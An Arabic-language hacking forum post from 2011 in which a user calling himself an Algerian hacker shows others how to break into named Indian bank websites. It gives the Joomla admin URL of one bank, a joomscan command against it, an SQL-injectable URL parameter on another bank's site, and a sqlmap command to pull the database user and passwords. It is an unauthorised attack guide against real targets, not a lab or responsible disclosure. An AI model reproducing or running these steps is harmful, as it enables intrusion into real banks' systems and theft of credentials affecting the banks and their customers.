التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-01-2011, 04:12 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية BrEaKeR-Dz
 

 

 
إحصائية العضو







BrEaKeR-Dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
BrEaKeR-Dz is on a distinguished road

................ SQLi in BnakIndia by BrEaKeR-Dz الهكر الجزائري


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله تعالى و بركاته


الآن كنت ادور في النت لقيت موقع بنك الهند صراحة موقع محمي .. و لغباء البنك

هو على سيرفر عام هههه يمكن إختراقه عادي . . طريقة الإختراق الي معاه الباك

تراك

الآن اقول له .. يدخل [ هنا ] رح يلاقي .. الموقع هاذا .


http://www.statebankofmysore.co.in/i...185&Itemid=233

الموقع هاذا طبعا الكل يعرقه .. جوملا الغني عن التعريف و الكل

يعرف رابط لوحة التحكم ..


http://www.statebankofmysore.co.in/administrator/

المهم الي عليك ترووح للباك تراك توجد اداة joomscan تقدر تعمل تشيك للثغرات

كل ثغرات جوملا .. يعني بلاامر


joomscan.pl -u http://www.statebankofmysore.co.in

إذا غالط صححوا لي .. لاني نسيت الامر

و تخلي الاداة تكمل فحصتها و انت شوف الثغرات المناسبة و الشغالة ..

و الي ما عنده الباك تراك مثلي انا قاعد يتفرج على الويندوز يجرب اي طريقة

لإختراق البنك .. البنك قلت على سيرفر عام يعني فيه 4 مواقع احرى او لم ادقق

منيح المهم رابط الثغرة ..


http://www.indianbank.in/loans.php?by=7
نشوف : http://www.indianbank.in/loans.php?by=7%27

نرى ان الكتابة إختفت دلالة على وجود الثغرة .. صاحب لاباك تراك عبر اداة

sqlmap

يمكن الإتصال بقاعدة البيانات .. عبر الامر ..


sqlmap.py -u http://www.indianbank.in/loans.php?by=7 -v 1 --current-user --passwords

و يخليه و إن شاء الله النتيجة إيجابية .. و الي على الويندوز يجرب على الهافيج انا ما

و مو على جهازي اصلا على جهاز اخي .. جهازي ضاع مسكين .. الله يعين

هاذا الي اقول الآن .. واي استفسار اتفضل بدنا ننقاش الامر ..

اخوكم
الهكر الجزائري BrEaKeR-Dz

السلام عليكم




SQLi in BnakIndia by BrEaKeR-Dz hgi;v hg[.hzvd

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:05 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0